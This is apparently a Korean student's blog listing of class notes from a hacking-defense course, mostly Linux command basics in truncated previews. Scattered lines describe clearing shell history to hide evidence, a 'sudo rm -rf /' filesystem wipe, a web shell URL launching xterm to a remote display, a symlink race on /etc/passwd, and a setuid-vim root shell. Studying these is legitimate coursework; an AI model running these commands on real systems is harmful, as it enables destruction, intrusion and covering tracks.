학과 공부/해킹방어이론과실습6 4/10 IPC -> file. socket find는 현재 디렉토리 및 그 하위 디렉토리들까지 포함 history에 남는 내 명령오 기록들bash-> .bash_history csh-> .history아직 파일로 기록이 안남았다 로그아웃할때 남는다. memory버퍼로 history는 남아있는 것이다. 로그아웃하기 전에 set history 0 을 주어야 증거 안남겠지!or history -c !! 바로 앞에실행한 명령어!-2 2개 전에 실행한 명령어 history !9!echo 자동완성 ^ls^touch앞에 ls가 touch로! command & ->1번 job이 되서 백그라운드로 돌아간다fg -> foreground로 돌아온다다시 bg-> ctrl z fg %1fg %2 nice -9 39103(process.. 2018. 4. 13. 4/12 find로 찾는 것이 정확 find -type l cd /; ls -aslR > /tmp/today.txt cd /; ls -aslR > /tmp/tommorow.txt diff today.txt tomorrow.txt cpa옵션: 파일 속성 유지R옵션: 소유주도 바뀌게 된다p옵션: 파일 생성시간, 변조시간 cp /bin/login /bin/login.org-> cp /bin/login.org /bin/loginpresercing copy를 사용하자! 원본그대로 옮겨 둘 수 있다cp -p rm alias 고려-> rm -i 전체 파일 시스템 지우는 명령어는 어떤게 좋을지fedora리눅스! nohup sudo rm -rf /& 작업 속도가 느려서 걸린다파일시스템 통으로 날리는 명령어 있다man -k re.. 2018. 4. 13. 4/5 /usr/bin : 일반 명령/sbin : 시스템 관련 명령/etc : 설정파일 /lib: ~.so include x11 : gui와 관련해서 c로 시작하는 것(character device 한글자로 입력받는것. 키보드처럼)과 b로 시작하는 것(block단위로 입력받는것)-> file d로 시작하면 디렉토리l : 링크 걸려 있는것 varlog /usr/lib/var/private/var race condition! 메일 큐 \메일 큐에 담길 이름 예측해서 ln-s /var/spool/mail~ /etc/passwd메일로 /etc/passwd 넘어간다! 해결방법으로 tmpnam이라는 함수 사용했지만 랜덤하지 않다는 점에서 문제 drwxrwxrwtt는 스티키 비트 swap space not enough sp.. 2018. 4. 5. 4/3 웺쉘! shell.php.png 사실 확장자가 의미가 있지 않아!확장자에 매칭이 되는 어플리케이션을 연결해주는 데에만 의의가 있다헤더가 중요한것! url?cmd=id url?cmd-xterm -display%20192.168.142.2:0 내 pc 가 xhost+일때만 위험 startx 나 xinit | |.startx .xinitrc 여기 파일에 xhost-를 넣어두면 안전! xterm 6000-6035번 포트를 사용하는데, 그래서 주로 방화벽으로 막아놓은다!, 퀴즈 원격 서버에 있는 파일을 내쪽으로 전송해 오는 방법-scp,sftp,ftp-email mail sonysame@naver.com encoded.txt uudecode ./encoded.txt(메일로 온것은 uudecode를 사용해서 디코딩.. 2018. 4. 3. 3/15 :r /etc/passwd:r !ls bash shel --동적분석--ptracestracetrussdtrace ls -asl /usr/bin/passwd r-s --x --x setuid 실행되는 동안은 관리자 권한을 잠시 상속받는다. chmod +s /usr/bin/vim그렇다면, vi를 실행하는 도중에! /bin/bash 실행시키면 쉘이 따진다 mac OS ---ssh----> Amazon AWS .bash-profile.bashrc umask 022 (파일 생성될때 소유자는 읽고 쓰고 실행 가능 나머지는 읽고 실행 가능으로 ) metasploitableDVL: 취약한 리눅스 배포판 scp / ftp: 이 명령어를 사용하면 로그가 남는다. /var/log/wtmp/var/log/utmp/var/lo.. 2018. 3. 15. 3/13 vicommand mode 와 edit mode 가 있다esc로 edit mode->command modea(다음 커서부터)/i(자기 커서부터)/o(다음 줄부터)로 command mode->edit mode h :wq 저장하고 빠져나온다:q! 그냥 빠져나온다:w 저장만:w file 다른 이름으로 저장:w! file 기존 파일 존재해도 덮어쓰기!:q! 변경사항 저장 안하고 무작정 빠져나오기 /etc/passwd pwd 홈 디렉토리(~) ^ 첫번째 컬럼$ 끝을 의미한다 :13, $ d:1, $ s/root/toor/g:1, $ s/^/3333/c:1, $ s/$/3333/c 진짜 달러를 넣고 싶으면 $ 를 사용! *diff 파일명A 파일명B 2018. 3. 13. 이전 1 다음